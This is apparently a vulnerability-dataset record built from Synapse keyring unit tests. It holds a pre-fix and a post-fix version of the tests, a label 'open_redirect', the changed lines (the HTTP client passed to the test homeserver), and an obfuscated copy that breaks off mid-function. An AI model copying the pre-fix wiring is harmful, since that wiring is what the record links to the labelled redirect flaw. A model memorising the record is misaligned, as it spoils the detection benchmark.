key1 = signedjson.key.generate_signing_key(1)
async def get_keys1(keys_to_fetch):
self.assertEqual(keys_to_fetch, {"server1": {get_key_id(key1): 1500}})
return {
"server1": {get_key_id(key1): FetchKeyResult(get_verify_key(key1), 800)}
}
async def get_keys2(keys_to_fetch):
self.assertEqual(keys_to_fetch, {"server1": {get_key_id(key1): 1500}})
return {
"server1": {
get_key_id(key1): FetchKeyResult(get_verify_key(key1), 1200)
}
}
mock_fetcher1 = keyring.KeyFetcher()
mock_fetcher1.get_keys = Mock(side_effect=get_keys1)
mock_fetcher2 = keyring.KeyFetcher()
mock_fetcher2.get_keys = Mock(side_effect=get_keys2)
kr = keyring.Keyring(self.hs, key_fetchers=(mock_fetcher1, mock_fetcher2))
json1 = {}
signedjson.sign.sign_json(json1, "server1", key1)
results = kr.verify_json_objects_for_server(
[("server1", json1, 1200, "test1"), ("server1", json1, 1500, "test2")]
)
self.assertEqual(len(results), 2)
self.get_success(results[0])
e = self.get_failure(results[1], SynapseError).value
self.assertEqual(e.errcode, "M_UNAUTHORIZED")
self.assertEqual(e.code, 401)
# there should have been a single call to each fetcher
mock_fetcher1.get_keys.assert_called_once()
mock_fetcher2.get_keys.assert_called_once()
@logcontext_clean
class ServerKeyFetcherTestCase(unittest.HomeserverTestCase):
def make_homeserver(self, reactor, clock):
self.http_client = Mock()
hs = self.setup_test_homeserver(http_client=self.http_client)
return hs
def test_get_keys_from_server(self):
# arbitrarily advance the clock a bit
self.reactor.advance(100)
SERVER_NAME = "server2"
fetcher = ServerKeyFetcher(self.hs)
testkey = signedjson.key.generate_signing_key("ver1")
testverifykey = signedjson.key.get_verify_key(testkey)
testverifykey_id = "ed25519:ver1"
VALID_UNTIL_TS = 200 * 1000
# valid response
response = {
"server_name": SERVER_NAME,
"old_verify_keys": {},
"valid_until_ts": VALID_UNTIL_TS,
"verify_keys": {
testverifykey_id: {
"key": signedjson.key.encode_verify_key_base64(testverifykey)
}
},
}
signedjson.sign.sign_json(response, SERVER_NAME, testkey)
async def get_json(destination, path, **kwargs):
self.assertEqual(destination, SERVER_NAME)
self.assertEqual(path, "/_matrix/key/v2/server/key1")
return response
self.http_client.get_json.side_effect = get_json
keys_to_fetch = {SERVER_NAME: {"key1": 0}}
keys = self.get_success(fetcher.get_keys(keys_to_fetch))
k = keys[SERVER_NAME][testverifykey_id]
self.assertEqual(k.valid_until_ts, VALID_UNTIL_TS)
self.assertEqual(k.verify_key, testverifykey)
self.assertEqual(k.verify_key.alg, "ed25519")
self.assertEqual(k.verify_key.version, "ver1")
# check that the perspectives store is correctly updated
lookup_triplet = (SERVER_NAME, testverifykey_id, None)
key_json = self.get_success(
self.hs.get_datastore().get_server_keys_json([lookup_triplet])
)
res = key_json[lookup_triplet]
self.assertEqual(len(res), 1)
res = res[0]
self.assertEqual(res["key_id"], testverifykey_id)
self.assertEqual(res["from_server"], SERVER_NAME)
self.assertEqual(res["ts_added_ms"], self.reactor.seconds() * 1000)
self.assertEqual(res["ts_valid_until_ms"], VALID_UNTIL_TS)
# we expect it to be encoded as canonical json *before* it hits the db
self.assertEqual(
bytes(res["key_json"]), canonicaljson.encode_canonical_json(response)
)
# change the server name: the result should be ignored
response["server_name"] = "OTHER_SERVER"
keys = self.get_success(fetcher.get_keys(keys_to_fetch))
self.assertEqual(keys, {})
class PerspectivesKeyFetcherTestCase(unittest.HomeserverTestCase):
def make_homeserver(self, reactor, clock):
self.mock_perspective_server = MockPerspectiveServer()
self.http_client = Mock()
config = self.default_config()
config["trusted_key_servers"] = [
{
"server_name": self.mock_perspective_server.server_name,
"verify_keys": self.mock_perspective_server.get_verify_keys(),
}
]
return self.setup_test_homeserver(http_client=self.http_client, config=config)
def build_perspectives_response(
self, server_name: str, signing_key: SigningKey, valid_until_ts: int,
) -> dict:
"""
Build a valid perspectives server response to a request for the given key
"""
verify_key = signedjson.key.get_verify_key(signing_key)
verifykey_id = "%s:%s" % (verify_key.alg, verify_key.version)
response = {
"server_name": server_name,
"old_verify_keys": {},
"valid_until_ts": valid_until_ts,
"verify_keys": {
verifykey_id: {
"key": signedjson.key.encode_verify_key_base64(verify_key)
}
},
}
# the response must be signed by both the origin server and the perspectives
# server.
signedjson.sign.sign_json(response, server_name, signing_key)
self.mock_perspective_server.sign_response(response)
return response
def expect_outgoing_key_query(
self, expected_server_name: str, expected_key_id: str, response: dict
) -> None:
"""
Tell the mock http client to expect a perspectives-server key query
"""
async def post_json(destination, path, data, **kwargs):
self.assertEqual(destination, self.mock_perspective_server.server_name)
self.assertEqual(path, "/_matrix/key/v2/query")
# check that the request is for the expected key
q = data["server_keys"]
self.assertEqual(list(q[expected_server_name].keys()), [expected_key_id])
return {"server_keys": [response]}
self.http_client.post_json.side_effect = post_json
def test_get_keys_from_perspectives(self):
# arbitrarily advance the clock a bit
self.reactor.advance(100)
fetcher = PerspectivesKeyFetcher(self.hs)
SERVER_NAME = "server2"
testkey = signedjson.key.generate_signing_key("ver1")
testverifykey = signedjson.key.get_verify_key(testkey)
testverifykey_id = "ed25519:ver1"
VALID_UNTIL_TS = 200 * 1000
response = self.build_perspectives_response(
SERVER_NAME, testkey, VALID_UNTIL_TS,
)
self.expect_outgoing_key_query(SERVER_NAME, "key1", response)
keys_to_fetch = {SERVER_NAME: {"key1": 0}}
keys = self.get_success(fetcher.get_keys(keys_to_fetch))
self.assertIn(SERVER_NAME, keys)
k = keys[SERVER_NAME][testverifykey_id]
self.assertEqual(k.valid_until_ts, VALID_UNTIL_TS)
self.assertEqual(k.verify_key, testverifykey)
self.assertEqual(k.verify_key.alg, "ed25519")
self.assertEqual(k.verify_key.version, "ver1")
# check that the perspectives store is correctly updated
lookup_triplet = (SERVER_NAME, testverifykey_id, None)
key_json = self.get_success(
self.hs.get_datastore().get_server_keys_json([lookup_triplet])
)
res = key_json[lookup_triplet]
self.assertEqual(len(res), 1)
res = res[0]
self.assertEqual(res["key_id"], testverifykey_id)
self.assertEqual(res["from_server"], self.mock_perspective_server.server_name)
self.assertEqual(res["ts_added_ms"], self.reactor.seconds() * 1000)
self.assertEqual(res["ts_valid_until_ms"], VALID_UNTIL_TS)
self.assertEqual(
bytes(res["key_json"]), canonicaljson.encode_canonical_json(response)
)
def test_get_perspectives_own_key(self):
"""Check that we can get the perspectives server's own keys
This is slightly complicated by the fact that the perspectives server may
use different keys for signing notary responses.
"""
# arbitrarily advance the clock a bit
self.reactor.advance(100)
fetcher = PerspectivesKeyFetcher(self.hs)
SERVER_NAME = self.mock_perspective_server.server_name
testkey = signedjson.key.generate_signing_key("ver1")
testverifykey = signedjson.key.get_verify_key(testkey)
testverifykey_id = "ed25519:ver1"
VALID_UNTIL_TS = 200 * 1000
response = self.build_perspectives_response(
SERVER_NAME, testkey, VALID_UNTIL_TS
)
self.expect_outgoing_key_query(SERVER_NAME, "key1", response)
keys_to_fetch = {SERVER_NAME: {"key1": 0}}
keys = self.get_success(fetcher.get_keys(keys_to_fetch))
self.assertIn(SERVER_NAME, keys)
k = keys[SERVER_NAME][testverifykey_id]
self.assertEqual(k.valid_until_ts, VALID_UNTIL_TS)
self.assertEqual(k.verify_key, testverifykey)
self.assertEqual(k.verify_key.alg, "ed25519")
self.assertEqual(k.verify_key.version, "ver1")
# check that the perspectives store is correctly updated
lookup_triplet = (SERVER_NAME, testverifykey_id, None)
key_json = self.get_success(
self.hs.get_datastore().get_server_keys_json([lookup_triplet])
)
res = key_json[lookup_triplet]
self.assertEqual(len(res), 1)
res = res[0]
self.assertEqual(res["key_id"], testverifykey_id)
self.assertEqual(res["from_server"], self.mock_perspective_server.server_name)
self.assertEqual(res["ts_added_ms"], self.reactor.seconds() * 1000)
self.assertEqual(res["ts_valid_until_ms"], VALID_UNTIL_TS)
self.assertEqual(
bytes(res["key_json"]), canonicaljson.encode_canonical_json(response)
)
def test_invalid_perspectives_responses(self):
"""Check that invalid responses from the perspectives server are rejected"""
# arbitrarily advance the clock a bit
self.reactor.advance(100)
SERVER_NAME = "server2"
testkey = signedjson.key.generate_signing_key("ver1")
testverifykey = signedjson.key.get_verify_key(testkey)
testverifykey_id = "ed25519:ver1"
VALID_UNTIL_TS = 200 * 1000
def build_response():
return self.build_perspectives_response(
SERVER_NAME, testkey, VALID_UNTIL_TS
)
def get_key_from_perspectives(response):
fetcher = PerspectivesKeyFetcher(self.hs)
keys_to_fetch = {SERVER_NAME: {"key1": 0}}
self.expect_outgoing_key_query(SERVER_NAME, "key1", response)
return self.get_success(fetcher.get_keys(keys_to_fetch))
# start with a valid response so we can check we are testing the right thing
response = build_response()
keys = get_key_from_perspectives(response)
k = keys[SERVER_NAME][testverifykey_id]
self.assertEqual(k.verify_key, testverifykey)
# remove the perspectives server's signature
response = build_response()
del response["signatures"][self.mock_perspective_server.server_name]
keys = get_key_from_perspectives(response)
self.assertEqual(keys, {}, "Expected empty dict with missing persp server sig")
# remove the origin server's signature
response = build_response()
del response["signatures"][SERVER_NAME]
keys = get_key_from_perspectives(response)
self.assertEqual(keys, {}, "Expected empty dict with missing origin server sig")
def get_key_id(key):
"""Get the matrix ID tag for a given SigningKey or VerifyKey"""
return "%s:%s" % (key.alg, key.version)
@defer.inlineCallbacks
def run_in_context(f, *args, **kwargs):
with LoggingContext("testctx") as ctx:
# we set the "request" prop to make it easier to follow what's going on in the
# logs.
ctx.request = "testctx"
rv = yield f(*args, **kwargs)
return rv
def _verify_json_for_server(kr, *args):
"""thin wrapper around verify_json_for_server which makes sure it is wrapped
with the patched defer.inlineCallbacks.
"""
@defer.inlineCallbacks
def v():
rv1 = yield kr.verify_json_for_server(*args)
return rv1
return run_in_context(v)
| # -*- coding: utf-8 -*-
# Copyright 2017 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
from mock import Mock
import canonicaljson
import signedjson.key
import signedjson.sign
from nacl.signing import SigningKey
from signedjson.key import encode_verify_key_base64, get_verify_key
from twisted.internet import defer
from twisted.internet.defer import Deferred, ensureDeferred
from synapse.api.errors import SynapseError
from synapse.crypto import keyring
from synapse.crypto.keyring import (
PerspectivesKeyFetcher,
ServerKeyFetcher,
StoreKeyFetcher,
)
from synapse.logging.context import (
LoggingContext,
current_context,
make_deferred_yieldable,
)
from synapse.storage.keys import FetchKeyResult
from tests import unittest
from tests.test_utils import make_awaitable
from tests.unittest import logcontext_clean
class MockPerspectiveServer:
def __init__(self):
self.server_name = "mock_server"
self.key = signedjson.key.generate_signing_key(0)
def get_verify_keys(self):
vk = signedjson.key.get_verify_key(self.key)
return {"%s:%s" % (vk.alg, vk.version): encode_verify_key_base64(vk)}
def get_signed_key(self, server_name, verify_key):
key_id = "%s:%s" % (verify_key.alg, verify_key.version)
res = {
"server_name": server_name,
"old_verify_keys": {},
"valid_until_ts": time.time() * 1000 + 3600,
"verify_keys": {key_id: {"key": encode_verify_key_base64(verify_key)}},
}
self.sign_response(res)
return res
def sign_response(self, res):
signedjson.sign.sign_json(res, self.server_name, self.key)
@logcontext_clean
class KeyringTestCase(unittest.HomeserverTestCase):
def check_context(self, val, expected):
self.assertEquals(getattr(current_context(), "request", None), expected)
return val
def test_verify_json_objects_for_server_awaits_previous_requests(self):
mock_fetcher = keyring.KeyFetcher()
mock_fetcher.get_keys = Mock()
kr = keyring.Keyring(self.hs, key_fetchers=(mock_fetcher,))
# a signed object that we are going to try to validate
key1 = signedjson.key.generate_signing_key(1)
json1 = {}
signedjson.sign.sign_json(json1, "server10", key1)
# start off a first set of lookups. We make the mock fetcher block until this
# deferred completes.
first_lookup_deferred = Deferred()
async def first_lookup_fetch(keys_to_fetch):
self.assertEquals(current_context().request, "context_11")
self.assertEqual(keys_to_fetch, {"server10": {get_key_id(key1): 0}})
await make_deferred_yieldable(first_lookup_deferred)
return {
"server10": {
get_key_id(key1): FetchKeyResult(get_verify_key(key1), 100)
}
}
mock_fetcher.get_keys.side_effect = first_lookup_fetch
async def first_lookup():
with LoggingContext("context_11") as context_11:
context_11.request = "context_11"
res_deferreds = kr.verify_json_objects_for_server(
[("server10", json1, 0, "test10"), ("server11", {}, 0, "test11")]
)
# the unsigned json should be rejected pretty quickly
self.assertTrue(res_deferreds[1].called)
try:
await res_deferreds[1]
self.assertFalse("unsigned json didn't cause a failure")
except SynapseError:
pass
self.assertFalse(res_deferreds[0].called)
res_deferreds[0].addBoth(self.check_context, None)
await make_deferred_yieldable(res_deferreds[0])
d0 = ensureDeferred(first_lookup())
mock_fetcher.get_keys.assert_called_once()
# a second request for a server with outstanding requests
# should block rather than start a second call
async def second_lookup_fetch(keys_to_fetch):
self.assertEquals(current_context().request, "context_12")
return {
"server10": {
get_key_id(key1): FetchKeyResult(get_verify_key(key1), 100)
}
}
mock_fetcher.get_keys.reset_mock()
mock_fetcher.get_keys.side_effect = second_lookup_fetch
second_lookup_state = [0]
async def second_lookup():
with LoggingContext("context_12") as context_12:
context_12.request = "context_12"
res_deferreds_2 = kr.verify_json_objects_for_server(
[("server10", json1, 0, "test")]
)
res_deferreds_2[0].addBoth(self.check_context, None)
second_lookup_state[0] = 1
await make_deferred_yieldable(res_deferreds_2[0])
second_lookup_state[0] = 2
d2 = ensureDeferred(second_lookup())
self.pump()
# the second request should be pending, but the fetcher should not yet have been
# called
self.assertEqual(second_lookup_state[0], 1)
mock_fetcher.get_keys.assert_not_called()
# complete the first request
first_lookup_deferred.callback(None)
# and now both verifications should succeed.
self.get_success(d0)
self.get_success(d2)
def test_verify_json_for_server(self):
kr = keyring.Keyring(self.hs)
key1 = signedjson.key.generate_signing_key(1)
r = self.hs.get_datastore().store_server_verify_keys(
"server9",
time.time() * 1000,
[("server9", get_key_id(key1), FetchKeyResult(get_verify_key(key1), 1000))],
)
self.get_success(r)
json1 = {}
signedjson.sign.sign_json(json1, "server9", key1)
# should fail immediately on an unsigned object
d = _verify_json_for_server(kr, "server9", {}, 0, "test unsigned")
self.get_failure(d, SynapseError)
# should succeed on a signed object
d = _verify_json_for_server(kr, "server9", json1, 500, "test signed")
# self.assertFalse(d.called)
self.get_success(d)
def test_verify_json_for_server_with_null_valid_until_ms(self):
"""Tests that we correctly handle key requests for keys we've stored
with a null `ts_valid_until_ms`
"""
mock_fetcher = keyring.KeyFetcher()
mock_fetcher.get_keys = Mock(return_value=make_awaitable({}))
kr = keyring.Keyring(
self.hs, key_fetchers=(StoreKeyFetcher(self.hs), mock_fetcher)
)
key1 = signedjson.key.generate_signing_key(1)
r = self.hs.get_datastore().store_server_verify_keys(
"server9",
time.time() * 1000,
[("server9", get_key_id(key1), FetchKeyResult(get_verify_key(key1), None))],
)
self.get_success(r)
json1 = {}
signedjson.sign.sign_json(json1, "server9", key1)
# should fail immediately on an unsigned object
d = _verify_json_for_server(kr, "server9", {}, 0, "test unsigned")
self.get_failure(d, SynapseError)
# should fail on a signed object with a non-zero minimum_valid_until_ms,
# as it tries to refetch the keys and fails.
d = _verify_json_for_server(
kr, "server9", json1, 500, "test signed non-zero min"
)
self.get_failure(d, SynapseError)
# We expect the keyring tried to refetch the key once.
mock_fetcher.get_keys.assert_called_once_with(
{"server9": {get_key_id(key1): 500}}
)
# should succeed on a signed object with a 0 minimum_valid_until_ms
d = _verify_json_for_server(
kr, "server9", json1, 0, "test signed with zero min"
)
self.get_success(d)
def test_verify_json_dedupes_key_requests(self):
"""Two requests for the same key should be deduped."""
key1 = signedjson.key.generate_signing_key(1)
async def get_keys(keys_to_fetch):
# there should only be one request object (with the max validity)
self.assertEqual(keys_to_fetch, {"server1": {get_key_id(key1): 1500}})
return {
"server1": {
get_key_id(key1): FetchKeyResult(get_verify_key(key1), 1200)
}
}
mock_fetcher = keyring.KeyFetcher()
mock_fetcher.get_keys = Mock(side_effect=get_keys)
kr = keyring.Keyring(self.hs, key_fetchers=(mock_fetcher,))
json1 = {}
signedjson.sign.sign_json(json1, "server1", key1)
# the first request should succeed; the second should fail because the key
# has expired
results = kr.verify_json_objects_for_server(
[("server1", json1, 500, "test1"), ("server1", json1, 1500, "test2")]
)
self.assertEqual(len(results), 2)
self.get_success(results[0])
e = self.get_failure(results[1], SynapseError).value
self.assertEqual(e.errcode, "M_UNAUTHORIZED")
self.assertEqual(e.code, 401)
# there should have been a single call to the fetcher
mock_fetcher.get_keys.assert_called_once()
def test_verify_json_falls_back_to_other_fetchers(self):
"""If the first fetcher cannot provide a recent enough key, we fall back"""
key1 = signedjson.key.generate_signing_key(1)
async def get_keys1(keys_to_fetch):
self.assertEqual(keys_to_fetch, {"server1": {get_key_id(key1): 1500}})
return {
"server1": {get_key_id(key1): FetchKeyResult(get_verify_key(key1), 800)}
}
async def get_keys2(keys_to_fetch):
self.assertEqual(keys_to_fetch, {"server1": {get_key_id(key1): 1500}})
return {
"server1": {
get_key_id(key1): FetchKeyResult(get_verify_key(key1), 1200)
}
}
mock_fetcher1 = keyring.KeyFetcher()
mock_fetcher1.get_keys = Mock(side_effect=get_keys1)
mock_fetcher2 = keyring.KeyFetcher()
mock_fetcher2.get_keys = Mock(side_effect=get_keys2)
kr = keyring.Keyring(self.hs, key_fetchers=(mock_fetcher1, mock_fetcher2))
json1 = {}
signedjson.sign.sign_json(json1, "server1", key1)
results = kr.verify_json_objects_for_server(
[("server1", json1, 1200, "test1"), ("server1", json1, 1500, "test2")]
)
self.assertEqual(len(results), 2)
self.get_success(results[0])
e = self.get_failure(results[1], SynapseError).value
self.assertEqual(e.errcode, "M_UNAUTHORIZED")
self.assertEqual(e.code, 401)
# there should have been a single call to each fetcher
mock_fetcher1.get_keys.assert_called_once()
mock_fetcher2.get_keys.assert_called_once()
@logcontext_clean
class ServerKeyFetcherTestCase(unittest.HomeserverTestCase):
def make_homeserver(self, reactor, clock):
self.http_client = Mock()
hs = self.setup_test_homeserver(federation_http_client=self.http_client)
return hs
def test_get_keys_from_server(self):
# arbitrarily advance the clock a bit
self.reactor.advance(100)
SERVER_NAME = "server2"
fetcher = ServerKeyFetcher(self.hs)
testkey = signedjson.key.generate_signing_key("ver1")
testverifykey = signedjson.key.get_verify_key(testkey)
testverifykey_id = "ed25519:ver1"
VALID_UNTIL_TS = 200 * 1000
# valid response
response = {
"server_name": SERVER_NAME,
"old_verify_keys": {},
"valid_until_ts": VALID_UNTIL_TS,
"verify_keys": {
testverifykey_id: {
"key": signedjson.key.encode_verify_key_base64(testverifykey)
}
},
}
signedjson.sign.sign_json(response, SERVER_NAME, testkey)
async def get_json(destination, path, **kwargs):
self.assertEqual(destination, SERVER_NAME)
self.assertEqual(path, "/_matrix/key/v2/server/key1")
return response
self.http_client.get_json.side_effect = get_json
keys_to_fetch = {SERVER_NAME: {"key1": 0}}
keys = self.get_success(fetcher.get_keys(keys_to_fetch))
k = keys[SERVER_NAME][testverifykey_id]
self.assertEqual(k.valid_until_ts, VALID_UNTIL_TS)
self.assertEqual(k.verify_key, testverifykey)
self.assertEqual(k.verify_key.alg, "ed25519")
self.assertEqual(k.verify_key.version, "ver1")
# check that the perspectives store is correctly updated
lookup_triplet = (SERVER_NAME, testverifykey_id, None)
key_json = self.get_success(
self.hs.get_datastore().get_server_keys_json([lookup_triplet])
)
res = key_json[lookup_triplet]
self.assertEqual(len(res), 1)
res = res[0]
self.assertEqual(res["key_id"], testverifykey_id)
self.assertEqual(res["from_server"], SERVER_NAME)
self.assertEqual(res["ts_added_ms"], self.reactor.seconds() * 1000)
self.assertEqual(res["ts_valid_until_ms"], VALID_UNTIL_TS)
# we expect it to be encoded as canonical json *before* it hits the db
self.assertEqual(
bytes(res["key_json"]), canonicaljson.encode_canonical_json(response)
)
# change the server name: the result should be ignored
response["server_name"] = "OTHER_SERVER"
keys = self.get_success(fetcher.get_keys(keys_to_fetch))
self.assertEqual(keys, {})
class PerspectivesKeyFetcherTestCase(unittest.HomeserverTestCase):
def make_homeserver(self, reactor, clock):
self.mock_perspective_server = MockPerspectiveServer()
self.http_client = Mock()
config = self.default_config()
config["trusted_key_servers"] = [
{
"server_name": self.mock_perspective_server.server_name,
"verify_keys": self.mock_perspective_server.get_verify_keys(),
}
]
return self.setup_test_homeserver(
federation_http_client=self.http_client, config=config
)
def build_perspectives_response(
self, server_name: str, signing_key: SigningKey, valid_until_ts: int,
) -> dict:
"""
Build a valid perspectives server response to a request for the given key
"""
verify_key = signedjson.key.get_verify_key(signing_key)
verifykey_id = "%s:%s" % (verify_key.alg, verify_key.version)
response = {
"server_name": server_name,
"old_verify_keys": {},
"valid_until_ts": valid_until_ts,
"verify_keys": {
verifykey_id: {
"key": signedjson.key.encode_verify_key_base64(verify_key)
}
},
}
# the response must be signed by both the origin server and the perspectives
# server.
signedjson.sign.sign_json(response, server_name, signing_key)
self.mock_perspective_server.sign_response(response)
return response
def expect_outgoing_key_query(
self, expected_server_name: str, expected_key_id: str, response: dict
) -> None:
"""
Tell the mock http client to expect a perspectives-server key query
"""
async def post_json(destination, path, data, **kwargs):
self.assertEqual(destination, self.mock_perspective_server.server_name)
self.assertEqual(path, "/_matrix/key/v2/query")
# check that the request is for the expected key
q = data["server_keys"]
self.assertEqual(list(q[expected_server_name].keys()), [expected_key_id])
return {"server_keys": [response]}
self.http_client.post_json.side_effect = post_json
def test_get_keys_from_perspectives(self):
# arbitrarily advance the clock a bit
self.reactor.advance(100)
fetcher = PerspectivesKeyFetcher(self.hs)
SERVER_NAME = "server2"
testkey = signedjson.key.generate_signing_key("ver1")
testverifykey = signedjson.key.get_verify_key(testkey)
testverifykey_id = "ed25519:ver1"
VALID_UNTIL_TS = 200 * 1000
response = self.build_perspectives_response(
SERVER_NAME, testkey, VALID_UNTIL_TS,
)
self.expect_outgoing_key_query(SERVER_NAME, "key1", response)
keys_to_fetch = {SERVER_NAME: {"key1": 0}}
keys = self.get_success(fetcher.get_keys(keys_to_fetch))
self.assertIn(SERVER_NAME, keys)
k = keys[SERVER_NAME][testverifykey_id]
self.assertEqual(k.valid_until_ts, VALID_UNTIL_TS)
self.assertEqual(k.verify_key, testverifykey)
self.assertEqual(k.verify_key.alg, "ed25519")
self.assertEqual(k.verify_key.version, "ver1")
# check that the perspectives store is correctly updated
lookup_triplet = (SERVER_NAME, testverifykey_id, None)
key_json = self.get_success(
self.hs.get_datastore().get_server_keys_json([lookup_triplet])
)
res = key_json[lookup_triplet]
self.assertEqual(len(res), 1)
res = res[0]
self.assertEqual(res["key_id"], testverifykey_id)
self.assertEqual(res["from_server"], self.mock_perspective_server.server_name)
self.assertEqual(res["ts_added_ms"], self.reactor.seconds() * 1000)
self.assertEqual(res["ts_valid_until_ms"], VALID_UNTIL_TS)
self.assertEqual(
bytes(res["key_json"]), canonicaljson.encode_canonical_json(response)
)
def test_get_perspectives_own_key(self):
"""Check that we can get the perspectives server's own keys
This is slightly complicated by the fact that the perspectives server may
use different keys for signing notary responses.
"""
# arbitrarily advance the clock a bit
self.reactor.advance(100)
fetcher = PerspectivesKeyFetcher(self.hs)
SERVER_NAME = self.mock_perspective_server.server_name
testkey = signedjson.key.generate_signing_key("ver1")
testverifykey = signedjson.key.get_verify_key(testkey)
testverifykey_id = "ed25519:ver1"
VALID_UNTIL_TS = 200 * 1000
response = self.build_perspectives_response(
SERVER_NAME, testkey, VALID_UNTIL_TS
)
self.expect_outgoing_key_query(SERVER_NAME, "key1", response)
keys_to_fetch = {SERVER_NAME: {"key1": 0}}
keys = self.get_success(fetcher.get_keys(keys_to_fetch))
self.assertIn(SERVER_NAME, keys)
k = keys[SERVER_NAME][testverifykey_id]
self.assertEqual(k.valid_until_ts, VALID_UNTIL_TS)
self.assertEqual(k.verify_key, testverifykey)
self.assertEqual(k.verify_key.alg, "ed25519")
self.assertEqual(k.verify_key.version, "ver1")
# check that the perspectives store is correctly updated
lookup_triplet = (SERVER_NAME, testverifykey_id, None)
key_json = self.get_success(
self.hs.get_datastore().get_server_keys_json([lookup_triplet])
)
res = key_json[lookup_triplet]
self.assertEqual(len(res), 1)
res = res[0]
self.assertEqual(res["key_id"], testverifykey_id)
self.assertEqual(res["from_server"], self.mock_perspective_server.server_name)
self.assertEqual(res["ts_added_ms"], self.reactor.seconds() * 1000)
self.assertEqual(res["ts_valid_until_ms"], VALID_UNTIL_TS)
self.assertEqual(
bytes(res["key_json"]), canonicaljson.encode_canonical_json(response)
)
def test_invalid_perspectives_responses(self):
"""Check that invalid responses from the perspectives server are rejected"""
# arbitrarily advance the clock a bit
self.reactor.advance(100)
SERVER_NAME = "server2"
testkey = signedjson.key.generate_signing_key("ver1")
testverifykey = signedjson.key.get_verify_key(testkey)
testverifykey_id = "ed25519:ver1"
VALID_UNTIL_TS = 200 * 1000
def build_response():
return self.build_perspectives_response(
SERVER_NAME, testkey, VALID_UNTIL_TS
)
def get_key_from_perspectives(response):
fetcher = PerspectivesKeyFetcher(self.hs)
keys_to_fetch = {SERVER_NAME: {"key1": 0}}
self.expect_outgoing_key_query(SERVER_NAME, "key1", response)
return self.get_success(fetcher.get_keys(keys_to_fetch))
# start with a valid response so we can check we are testing the right thing
response = build_response()
keys = get_key_from_perspectives(response)
k = keys[SERVER_NAME][testverifykey_id]
self.assertEqual(k.verify_key, testverifykey)
# remove the perspectives server's signature
response = build_response()
del response["signatures"][self.mock_perspective_server.server_name]
keys = get_key_from_perspectives(response)
self.assertEqual(keys, {}, "Expected empty dict with missing persp server sig")
# remove the origin server's signature
response = build_response()
del response["signatures"][SERVER_NAME]
keys = get_key_from_perspectives(response)
self.assertEqual(keys, {}, "Expected empty dict with missing origin server sig")
def get_key_id(key):
"""Get the matrix ID tag for a given SigningKey or VerifyKey"""
return "%s:%s" % (key.alg, key.version)
@defer.inlineCallbacks
def run_in_context(f, *args, **kwargs):
with LoggingContext("testctx") as ctx:
# we set the "request" prop to make it easier to follow what's going on in the
# logs.
ctx.request = "testctx"
rv = yield f(*args, **kwargs)
return rv
def _verify_json_for_server(kr, *args):
"""thin wrapper around verify_json_for_server which makes sure it is wrapped
with the patched defer.inlineCallbacks.
"""
@defer.inlineCallbacks
def v():
rv1 = yield kr.verify_json_for_server(*args)
return rv1
return run_in_context(v)
| open_redirect | {
"code": [
" hs = self.setup_test_homeserver(http_client=self.http_client)",
" return self.setup_test_homeserver(http_client=self.http_client, config=config)"
],
"line_no": [
318,
398
]
} | {
"code": [
" hs = self.setup_test_homeserver(federation_http_client=self.http_client)",
" return self.setup_test_homeserver(",
" )"
],
"line_no": [
318,
398,
400
]
} |
import time
from mock import Mock
import canonicaljson
import signedjson.key
import signedjson.sign
from nacl.signing import SigningKey
from signedjson.key import .encode_verify_key_base64, get_verify_key
from twisted.internet import .defer
from twisted.internet.defer import Deferred, ensureDeferred
from synapse.api.errors import SynapseError
from synapse.crypto import .keyring
from synapse.crypto.keyring import (
PerspectivesKeyFetcher,
ServerKeyFetcher,
StoreKeyFetcher,
)
from synapse.logging.context import (
LoggingContext,
current_context,
make_deferred_yieldable,
)
from synapse.storage.keys import FetchKeyResult
from tests import unittest
from tests.test_utils import make_awaitable
from tests.unittest import logcontext_clean
class CLASS_0:
def __init__(self):
self.server_name = "mock_server"
self.key = signedjson.key.generate_signing_key(0)
def FUNC_3(self):
VAR_17 = signedjson.key.get_verify_key(self.key)
return {"%s:%s" % (VAR_17.alg, VAR_17.version): encode_verify_key_base64(VAR_17)}
def FUNC_4(self, VAR_5, VAR_6):
VAR_18 = "%s:%s" % (VAR_6.alg, VAR_6.version)
VAR_7 = {
"server_name": VAR_5,
"old_verify_keys": {},
"valid_until_ts": time.time() * 1000 + 3600,
"verify_keys": {VAR_18: {"key": encode_verify_key_base64(VAR_6)}},
}
self.sign_response(VAR_7)
return VAR_7
def FUNC_5(self, VAR_7):
signedjson.sign.sign_json(VAR_7, self.server_name, self.key)
@logcontext_clean
class CLASS_1(unittest.HomeserverTestCase):
def FUNC_6(self, VAR_8, VAR_9):
self.assertEquals(getattr(current_context(), "request", None), VAR_9)
return VAR_8
def FUNC_7(self):
VAR_19 = keyring.KeyFetcher()
VAR_19.get_keys = Mock()
VAR_4 = keyring.Keyring(self.hs, key_fetchers=(VAR_19,))
VAR_20 = signedjson.key.generate_signing_key(1)
VAR_21 = {}
signedjson.sign.sign_json(VAR_21, "server10", VAR_20)
VAR_22 = Deferred()
async def FUNC_20(VAR_23):
self.assertEquals(current_context().request, "context_11")
self.assertEqual(VAR_23, {"server10": {FUNC_0(VAR_20): 0}})
await make_deferred_yieldable(VAR_22)
return {
"server10": {
FUNC_0(VAR_20): FetchKeyResult(get_verify_key(VAR_20), 100)
}
}
VAR_19.get_keys.side_effect = FUNC_20
async def FUNC_21():
with LoggingContext("context_11") as context_11:
context_11.request = "context_11"
VAR_52 = VAR_4.verify_json_objects_for_server(
[("server10", VAR_21, 0, "test10"), ("server11", {}, 0, "test11")]
)
self.assertTrue(VAR_52[1].called)
try:
await VAR_52[1]
self.assertFalse("unsigned json didn't cause a failure")
except SynapseError:
pass
self.assertFalse(VAR_52[0].called)
VAR_52[0].addBoth(self.check_context, None)
await make_deferred_yieldable(VAR_52[0])
VAR_24 = ensureDeferred(FUNC_21())
VAR_19.get_keys.assert_called_once()
async def FUNC_22(VAR_23):
self.assertEquals(current_context().request, "context_12")
return {
"server10": {
FUNC_0(VAR_20): FetchKeyResult(get_verify_key(VAR_20), 100)
}
}
VAR_19.get_keys.reset_mock()
VAR_19.get_keys.side_effect = FUNC_22
VAR_25 = [0]
async def FUNC_23():
with LoggingContext("context_12") as context_12:
context_12.request = "context_12"
VAR_53 = VAR_4.verify_json_objects_for_server(
